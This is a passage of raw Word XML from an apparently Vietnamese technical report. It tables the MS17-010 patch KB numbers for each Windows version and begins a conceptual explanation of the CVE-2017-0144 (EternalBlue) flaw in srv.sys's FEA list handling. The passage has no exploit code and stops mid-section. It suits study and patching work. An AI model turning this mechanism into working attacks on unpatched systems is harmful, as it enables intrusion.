          <w:p w14:paraId="021D23E9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="32F74BFB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="542AA7B6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0370E58F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tương đồng mã bản vá với Windows 7 SP1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="425B8A7C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="70AA9F6B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CB2D25E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x86 và x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="533D3BC9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012213</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6F2B6D7A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012216</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7013CAE4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mục tiêu đối sánh trên thế hệ Windows mới hơn</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="1E270BAF" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4CDC820D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Server 2012 R2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4275FFBE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="43E0FFC1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012213</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="29C05FE3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012216</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="542B59F6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bản vá tương ứng Windows 8.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="7BCC723A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5AF7FFD4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Server 2012</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="771E5E40" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6312AF37" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012214</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5ED8B575" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012217</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3AB63999" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Phiên bản máy chủ thế hệ Windows 8</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4986D8BA" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6D471E7E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5C69B8B0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bản dựng 1507 (RTM)&lt;br&gt;Bản dựng 1511&lt;br&gt;Bản dựng 1607</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="5EDF2DF3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không áp dụng (chỉ có bản tích lũy)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="32F2A057" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012606</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (1507)&lt;br&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4013198</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (1511)&lt;br&gt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4013429</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> (1607)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="20FDF403" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 10 sử dụng mô hình cập nhật tích lũy Cumulative Update</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="747FE77C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="553535E7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Server 2016</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7561D30E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bản dựng 1607</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="44EAAEC1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không áp dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="7A3F06E3" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4013429</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5EF83E6E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tương đồng bản vá với Windows 10 Version 1607</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="0A4DD61A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="69E084F8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Vista SP2 / Server 2008 SP2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="655A00EC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x86 và x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="48E24DFA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012598</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2CD64D68" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không áp dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3464639A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bản cập nhật an ninh độc lập</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="43DB919A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="671B5E0A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows XP SP3 / Server 2003 SP2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1FF3811F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x86 và x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5BAD53C8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012598</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="23741179" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không áp dụng</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36CF256D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Bản vá khẩn cấp phát hành ngoài chu kỳ hỗ trợ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="596D93F7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="5BD24E75" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1.2.3. Cơ chế kỹ thuật của lỗ hổng CVE-2017-0144 và mã khai thác EternalBlue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E18D5A4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Nguyên nhân kỹ thuật phát sinh lỗ hổng CVE-2017-0144 liên quan đến lỗi xử lý cấu trúc File Extended Attributes (FEA) trong driver điều khiển </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> của hệ điều hành Windows khi phân tích các yêu cầu giao dịch SMBv1 [3], [5], [13]. Cơ chế phát sinh và khai thác lỗ hổng được mô tả qua ba bước logic sau:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09C8C714" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bước 1: Xử lý dữ liệu giao dịch sai kích thước khi phân tích danh sách FEA.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7689FD37" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Trong giao thức SMBv1, client có thể gửi thông tin thuộc tính mở rộng của tệp tin thông qua cấu trúc danh sách FEA (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>FEA_LIST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Để truyền tải dữ liệu lớn, client sử dụng các hàm giao dịch (Transaction requests) cho phép chia nhỏ dữ liệu thành nhiều gói bổ sung thứ cấp để server ghép lại trong bộ nhớ [2]. Trong quá trình chuyển đổi danh sách FEA từ định dạng OS/2 sang định dạng NT thông qua hàm nội bộ </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SrvOs2FeaToNt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (kèm theo hàm tính toán độ dài </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SrvOs2FeaListSizeToNt</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">), driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>srv.sys</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> gặp lỗi sai lệch toán học khi ép kiểu kích thước, dẫn đến tính toán sai tổng dung lượng bộ đệm cần thiết [3], [13].</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C4149A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="20" w:after="40"/>
        <w:ind w:left="432"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">• </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Bước 2: Sai lệch tính toán dẫn đến cấp phát vùng nhớ không phù hợp và ghi ngoài biên.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5727E5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
